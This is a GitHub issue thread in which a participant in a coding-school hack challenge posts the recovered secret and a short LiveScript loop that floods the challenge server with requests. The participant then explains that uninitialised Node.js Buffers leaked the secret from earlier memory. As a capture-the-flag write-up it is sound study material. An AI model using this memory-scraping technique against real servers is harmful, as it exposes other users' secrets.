### ISSUE TITLE
manbearpig1337h4x0rzzz

### ISSUE THREAD

**Issue by sunny-mittal** [codefellows/cf-hack-challenge-1#7]
The secret is manbearpig1337h4x0rzzz. Here's my livescript code:

``` livescript
http = require 'http'
url = 'http://cf-hack-challenge-1.herokuapp.com'
responses = []

for i in [1 to 1000]
  req = http.get url, (res) ->
    res.on 'data', (data) ->
      responses.push data.to-string('ascii')

module.exports = { responses }
```

I require this into a LS repl so that my responses array can asynchronously get populated and still give me a pointer to it. Then I inspect the array and find as many copies of the [mostly] same string as possible and put together matching parts.

UPDATE:
The vulnerability is from the fact that JS Buffers are not preallocated and contain whatever was previously in memory until writing occurs. You create two adjacent buffers, one from the secret and one purely based on size. Because of how buffers work, on subsequent hits to the server, it's possible that the memory that once held the secret (`secret`) will now be given to `resBuffer` and when you send that back to the client, it contains the secret with a bunch of other gunk.

**Comment by austinhinderer** [comment]
I think this is the right answer

**Comment by brookr** [comment]
It's... BEAUTIFUL!

**Comment by toastynerd** [comment]
:+1:
